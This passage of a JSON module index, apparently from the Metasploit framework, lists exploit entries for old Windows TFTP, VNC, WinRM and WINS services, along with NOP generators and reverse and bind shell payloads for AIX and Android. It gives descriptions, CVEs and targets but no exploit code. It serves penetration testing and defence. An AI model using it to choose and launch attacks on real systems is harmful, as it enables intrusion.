"name": "D-Link TFTP 1.0 Long Filename Buffer Overflow",
"full_name": "exploit/windows/tftp/dlink_long_filename",
"rank": 400,
"disclosure_date": "2007-03-12",
"type": "exploit",
"author": [
"LSO <lso@hushmail.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in D-Link TFTP 1.0.\n By sending a request for an overly long file name, an attacker\n could overflow a buffer and execute arbitrary code. For best results,\n use bind payloads with nonx (No NX).",
"references": [
"CVE-2007-1435",
"OSVDB-33977",
"BID-22923"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English",
"Windows 2000 SP3 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/tftp/dlink_long_filename.rb",
"is_install_path": true,
"ref_name": "windows/tftp/dlink_long_filename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/futuresoft_transfermode": {
"name": "FutureSoft TFTP Server 2000 Transfer-Mode Overflow",
"full_name": "exploit/windows/tftp/futuresoft_transfermode",
"rank": 200,
"disclosure_date": "2005-05-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the FutureSoft TFTP Server\n 2000 product. By sending an overly long transfer-mode string, we were able\n to overwrite both the SEH and the saved EIP. A subsequent write-exception\n that will occur allows the transferring of execution to our shellcode\n via the overwritten SEH. This module has been tested against Windows\n 2000 Professional and for some reason does not seem to work against\n Windows 2000 Server (could not trigger the overflow at all).",
"references": [
"CVE-2005-1812",
"OSVDB-16954",
"BID-13821"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 Pro English ALL",
"Windows XP Pro SP0/SP1 English",
"Windows NT SP5/SP6a English",
"Windows 2003 Server English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/futuresoft_transfermode.rb",
"is_install_path": true,
"ref_name": "windows/tftp/futuresoft_transfermode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/netdecision_tftp_traversal": {
"name": "NetDecision 4.2 TFTP Writable Directory Traversal Execution",
"full_name": "exploit/windows/tftp/netdecision_tftp_traversal",
"rank": 600,
"disclosure_date": "2009-05-16",
"type": "exploit",
"author": [
"Rob Kraus",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in NetDecision 4.2 TFTP server. The\n software contains a directory traversal vulnerability that allows a remote attacker\n to write arbitrary files to the file system, which results in code execution under\n the context of the user executing the TFTP Server.",
"references": [
"CVE-2009-1730",
"OSVDB-54607",
"BID-35002"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb",
"is_install_path": true,
"ref_name": "windows/tftp/netdecision_tftp_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/opentftp_error_code": {
"name": "OpenTFTP SP 1.4 Error Packet Overflow",
"full_name": "exploit/windows/tftp/opentftp_error_code",
"rank": 200,
"disclosure_date": "2008-07-05",
"type": "exploit",
"author": [
"tixxDZ",
"steponequit"
],
"description": "This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable\n condition triggers when the TFTP opcode is configured as an error packet; the TFTP\n service then formats the message using a sprintf() function, which causes an\n overflow, therefore allowing remote code execution under the context of SYSTEM.\n\n The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone',\n or 'Service'). By default the target is set to 'Service' because that's the default\n configuration during OpenTFTP Server SP 1.4's installation.",
"references": [
"CVE-2008-2161",
"OSVDB-44904",
"BID-29111",
"URL-http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"OpenTFTP 1.4 Service",
"OpenTFTP 1.4 Stand Alone"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/opentftp_error_code.rb",
"is_install_path": true,
"ref_name": "windows/tftp/opentftp_error_code",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/quick_tftp_pro_mode": {
"name": "Quick FTP Pro 2.1 Transfer-Mode Overflow",
"full_name": "exploit/windows/tftp/quick_tftp_pro_mode",
"rank": 400,
"disclosure_date": "2008-03-27",
"type": "exploit",
"author": [
"Saint Patrick"
],
"description": "This module exploits a stack buffer overflow in the Quick TFTP Pro server\n product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting\n in a DoS. This is a port of a sploit by Mati \"muts\" Aharoni.",
"references": [
"CVE-2008-1610",
"OSVDB-43784",
"BID-28459",
"URL-http://secunia.com/advisories/29494"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Server 2000",
"Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb",
"is_install_path": true,
"ref_name": "windows/tftp/quick_tftp_pro_mode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/tftpd32_long_filename": {
"name": "TFTPD32 Long Filename Buffer Overflow",
"full_name": "exploit/windows/tftp/tftpd32_long_filename",
"rank": 200,
"disclosure_date": "2002-11-19",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in TFTPD32 version 2.21\n and prior. By sending a request for an overly long file name\n to the tftpd32 server, a remote attacker could overflow a buffer and\n execute arbitrary code on the system.",
"references": [
"CVE-2002-2226",
"OSVDB-45903",
"BID-6199"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows NT 4.0 SP6a English",
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/tftpd32_long_filename.rb",
"is_install_path": true,
"ref_name": "windows/tftp/tftpd32_long_filename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/tftpdwin_long_filename": {
"name": "TFTPDWIN v0.4.2 Long Filename Buffer Overflow",
"full_name": "exploit/windows/tftp/tftpdwin_long_filename",
"rank": 500,
"disclosure_date": "2006-09-21",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending\n an overly long file name to the tftpd.exe server, the stack can be overwritten.",
"references": [
"CVE-2006-4948",
"OSVDB-29032",
"BID-20131",
"EDB-3132"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal - tftpd.exe"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/tftp/tftpdwin_long_filename.rb",
"is_install_path": true,
"ref_name": "windows/tftp/tftpdwin_long_filename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/tftpserver_wrq_bof": {
"name": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow",
"full_name": "exploit/windows/tftp/tftpserver_wrq_bof",
"rank": 300,
"disclosure_date": "2008-03-26",
"type": "exploit",
"author": [
"Mati Aharoni",
"Datacut"
],
"description": "This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw\n is due to the way TFTP handles the filename parameter extracted from a WRQ request.\n The server will append the user-supplied filename to the TFTP server binary's path\n without any bounds checking, and then attempt to check this path with a fopen().\n Since this isn't a valid file path, fopen() returns null, which allows the\n corrupted data to be used in a strcmp() function, causing an access violation.\n\n Since the offset is sensitive to how the TFTP server is launched, you must know\n in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone',\n and then manually select your target accordingly. A successful attempt will lead\n to remote code execution under the context of SYSTEM if run as a service, or\n the user if run as a standalone. A failed attempt will result in a denial of service.",
"references": [
"CVE-2008-1611",
"OSVDB-43785",
"BID-18345",
"EDB-5314"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2/SP3 EN Service Mode",
"Windows XP SP2/SP3 EN Standalone Mode",
"Windows 7 SP0/SP1 EN x64 Service Mode",
"Windows 7 SP0/SP1 EN x64 Standalone Mode",
"Windows 7 SP0/SP1 EN x86 Service Mode",
"Windows 7 SP0/SP1 EN x86 Standalone Mode"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb",
"is_install_path": true,
"ref_name": "windows/tftp/tftpserver_wrq_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/threectftpsvc_long_mode": {
"name": "3CTftpSvc TFTP Long Mode Buffer Overflow",
"full_name": "exploit/windows/tftp/threectftpsvc_long_mode",
"rank": 500,
"disclosure_date": "2006-11-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By\n sending a specially crafted packet with an overly long mode\n field, a remote attacker could overflow a buffer and execute\n arbitrary code on the system.",
"references": [
"CVE-2006-6183",
"OSVDB-30758",
"BID-21301",
"URL-http://secunia.com/advisories/23113/"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"3CTftpSvc 2.0.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb",
"is_install_path": true,
"ref_name": "windows/tftp/threectftpsvc_long_mode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/unicenter/cam_log_security": {
"name": "CA CAM log_security() Stack Buffer Overflow (Win32)",
"full_name": "exploit/windows/unicenter/cam_log_security",
"rank": 500,
"disclosure_date": "2005-08-22",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the CA CAM service\n by passing a long parameter to the log_security() function.\n The CAM service is part of TNG Unicenter. This module has\n been tested on Unicenter v3.1.",
"references": [
"CVE-2005-2668",
"OSVDB-18916",
"BID-14622"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"W2API.DLL TNG 2.3",
"Windows 2000 SP0-SP4 English",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English",
"Windows 2003 SP0 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/unicenter/cam_log_security.rb",
"is_install_path": true,
"ref_name": "windows/unicenter/cam_log_security",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/vnc/realvnc_client": {
"name": "RealVNC 3.3.7 Client Buffer Overflow",
"full_name": "exploit/windows/vnc/realvnc_client",
"rank": 300,
"disclosure_date": "2001-01-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).",
"references": [
"CVE-2001-0167",
"OSVDB-6281",
"BID-2305"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English",
"Windows XP SP2 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/vnc/realvnc_client.rb",
"is_install_path": true,
"ref_name": "windows/vnc/realvnc_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/vnc/ultravnc_client": {
"name": "UltraVNC 1.0.1 Client Buffer Overflow",
"full_name": "exploit/windows/vnc/ultravnc_client",
"rank": 300,
"disclosure_date": "2006-04-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in UltraVNC Win32\n Viewer 1.0.1 Release.",
"references": [
"CVE-2006-1652",
"OSVDB-24456",
"BID-17378"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English",
"Windows XP SP2 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/vnc/ultravnc_client.rb",
"is_install_path": true,
"ref_name": "windows/vnc/ultravnc_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/vnc/ultravnc_viewer_bof": {
"name": "UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow",
"full_name": "exploit/windows/vnc/ultravnc_viewer_bof",
"rank": 300,
"disclosure_date": "2008-02-06",
"type": "exploit",
"author": [
"noperand"
],
"description": "This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.\n\n If a malicious server responds to a client connection indicating a minor\n protocol version of 14 or 16, a 32-bit integer is subsequently read from\n the TCP stream by the client and directly provided as the trusted size for\n further reading from the TCP stream into a 1024-byte character array on\n the stack.",
"references": [
"CVE-2008-0610",
"OSVDB-42840",
"BID-27561"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb",
"is_install_path": true,
"ref_name": "windows/vnc/ultravnc_viewer_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/vnc/winvnc_http_get": {
"name": "WinVNC Web Server GET Overflow",
"full_name": "exploit/windows/vnc/winvnc_http_get",
"rank": 200,
"disclosure_date": "2001-01-29",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in the AT&T WinVNC version\n <= v3.3.3r7 web server. When debugging mode with logging is\n enabled (non-default), an overly long GET request can overwrite\n the stack. This exploit does not work well with VNC payloads!",
"references": [
"BID-2306",
"OSVDB-6280",
"CVE-2001-0168"
],
"platform": "Windows",
"arch": "",
"rport": 5800,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows NT4 SP3-6",
"Windows 2000 SP1-4",
"Windows XP SP0-1"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/vnc/winvnc_http_get.rb",
"is_install_path": true,
"ref_name": "windows/vnc/winvnc_http_get",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/vpn/safenet_ike_11": {
"name": "SafeNet SoftRemote IKE Service Buffer Overflow",
"full_name": "exploit/windows/vpn/safenet_ike_11",
"rank": 200,
"disclosure_date": "2009-06-01",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Safenet SoftRemote IKE IreIKE.exe\n service. When sending a specially crafted udp packet to port 62514 an\n attacker may be able to execute arbitrary code. This module has\n been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using\n windows/meterpreter/reverse_ord_tcp payloads.",
"references": [
"CVE-2009-1943",
"OSVDB-54831",
"BID-35154",
"URL-http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1"
],
"platform": "Windows",
"arch": "",
"rport": 62514,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SafeNet Irelke 10.8.0.20",
"SafeNet Irelke 10.8.0.10",
"SafeNet Irelke 10.8.3.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/vpn/safenet_ike_11.rb",
"is_install_path": true,
"ref_name": "windows/vpn/safenet_ike_11",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/winrm/winrm_script_exec": {
"name": "WinRM Script Exec Remote Code Execution",
"full_name": "exploit/windows/winrm/winrm_script_exec",
"rank": 0,
"disclosure_date": "2012-11-01",
"type": "exploit",
"author": [
"thelightcosine"
],
"description": "This module uses valid credentials to login to the WinRM service\n and execute a payload. It has two available methods for payload\n delivery: Powershell 2.0 and VBS CmdStager.\n\n The module will check if Powershell 2.0 is available, and if so uses\n that method. Otherwise it falls back to the VBS CmdStager which is\n less stealthy.\n\n IMPORTANT: If targeting an x64 system with the Powershell method\n you MUST select an x64 payload. An x86 payload will never return.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 5985,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
5985,
5986
],
"autofilter_services": [
"http",
"https",
"winrm"
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/winrm/winrm_script_exec.rb",
"is_install_path": true,
"ref_name": "windows/winrm/winrm_script_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/wins/ms04_045_wins": {
"name": "MS04-045 Microsoft WINS Service Memory Overwrite",
"full_name": "exploit/windows/wins/ms04_045_wins",
"rank": 500,
"disclosure_date": "2004-12-14",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary memory write flaw in the\n WINS service. This exploit has been tested against Windows\n 2000 only.",
"references": [
"CVE-2004-1080",
"OSVDB-12378",
"BID-11763",
"MSB-MS04-045"
],
"platform": "Windows",
"arch": "",
"rport": 42,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/wins/ms04_045_wins.rb",
"is_install_path": true,
"ref_name": "windows/wins/ms04_045_wins",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_aarch64/simple": {
"name": "Simple",
"full_name": "nop/aarch64/simple",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
],
"description": "Simple NOP generator",
"references": [
],
"platform": "All",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-14 18:26:11 +0000",
"path": "/modules/nops/aarch64/simple.rb",
"is_install_path": true,
"ref_name": "aarch64/simple",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_armle/simple": {
"name": "Simple",
"full_name": "nop/armle/simple",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"hdm <x@hdm.io>"
],
"description": "Simple NOP generator",
"references": [
],
"platform": "All",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/armle/simple.rb",
"is_install_path": true,
"ref_name": "armle/simple",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_mipsbe/better": {
"name": "Better",
"full_name": "nop/mipsbe/better",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"jm"
],
"description": "Better NOP generator",
"references": [
],
"platform": "All",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/mipsbe/better.rb",
"is_install_path": true,
"ref_name": "mipsbe/better",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_php/generic": {
"name": "PHP Nop Generator",
"full_name": "nop/php/generic",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"hdm <x@hdm.io>"
],
"description": "Generates harmless padding for PHP scripts",
"references": [
],
"platform": "All",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/php/generic.rb",
"is_install_path": true,
"ref_name": "php/generic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_ppc/simple": {
"name": "Simple",
"full_name": "nop/ppc/simple",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"hdm <x@hdm.io>"
],
"description": "Simple NOP generator",
"references": [
],
"platform": "All",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-20 15:53:49 +0000",
"path": "/modules/nops/ppc/simple.rb",
"is_install_path": true,
"ref_name": "ppc/simple",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_sparc/random": {
"name": "SPARC NOP Generator",
"full_name": "nop/sparc/random",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "SPARC NOP generator",
"references": [
],
"platform": "All",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-27 11:24:38 +0000",
"path": "/modules/nops/sparc/random.rb",
"is_install_path": true,
"ref_name": "sparc/random",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_tty/generic": {
"name": "TTY Nop Generator",
"full_name": "nop/tty/generic",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"hdm <x@hdm.io>"
],
"description": "Generates harmless padding for TTY input",
"references": [
],
"platform": "All",
"arch": "tty",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/tty/generic.rb",
"is_install_path": true,
"ref_name": "tty/generic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_x64/simple": {
"name": "Simple",
"full_name": "nop/x64/simple",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "An x64 single/multi byte NOP instruction generator.",
"references": [
],
"platform": "All",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/x64/simple.rb",
"is_install_path": true,
"ref_name": "x64/simple",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_x86/opty2": {
"name": "Opty2",
"full_name": "nop/x86/opty2",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"spoonm <spoonm@no$email.com>",
"optyx <optyx@no$email.com>"
],
"description": "Opty2 multi-byte NOP generator",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/x86/opty2.rb",
"is_install_path": true,
"ref_name": "x86/opty2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_x86/single_byte": {
"name": "Single Byte",
"full_name": "nop/x86/single_byte",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "Single-byte NOP generator",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/x86/single_byte.rb",
"is_install_path": true,
"ref_name": "x86/single_byte",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_aix/ppc/shell_bind_tcp": {
"name": "AIX Command Shell, Bind TCP Inline",
"full_name": "payload/aix/ppc/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "AIX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "aix/ppc/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_aix/ppc/shell_find_port": {
"name": "AIX Command Shell, Find Port Inline",
"full_name": "payload/aix/ppc/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "AIX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/aix/ppc/shell_find_port.rb",
"is_install_path": true,
"ref_name": "aix/ppc/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_aix/ppc/shell_interact": {
"name": "AIX execve Shell for inetd",
"full_name": "payload/aix/ppc/shell_interact",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "Simply execve /bin/sh (for inetd programs)",
"references": [
],
"platform": "AIX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/aix/ppc/shell_interact.rb",
"is_install_path": true,
"ref_name": "aix/ppc/shell_interact",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_aix/ppc/shell_reverse_tcp": {
"name": "AIX Command Shell, Reverse TCP Inline",
"full_name": "payload/aix/ppc/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "AIX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "aix/ppc/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter/reverse_http": {
"name": "Android Meterpreter, Android Reverse HTTP Stager",
"full_name": "payload/android/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves",
"anwarelmakrahy"
],
"description": "Run a Meterpreter server on Android. Tunnel communication over HTTP",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_http.rb",
"is_install_path": true,
"ref_name": "android/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter/reverse_https": {
"name": "Android Meterpreter, Android Reverse HTTPS Stager",
"full_name": "payload/android/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves",
"anwarelmakrahy"
],
"description": "Run a Meterpreter server on Android. Tunnel communication over HTTPS",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_https.rb",
"is_install_path": true,
"ref_name": "android/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter/reverse_tcp": {
"name": "Android Meterpreter, Android Reverse TCP Stager",
"full_name": "payload/android/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a Meterpreter server on Android. Connect back stager",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "android/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter_reverse_http": {
"name": "Android Meterpreter Shell, Reverse HTTP Inline",
"full_name": "payload/android/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/android/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "android/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter_reverse_https": {
"name": "Android Meterpreter Shell, Reverse HTTPS Inline",
"full_name": "payload/android/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
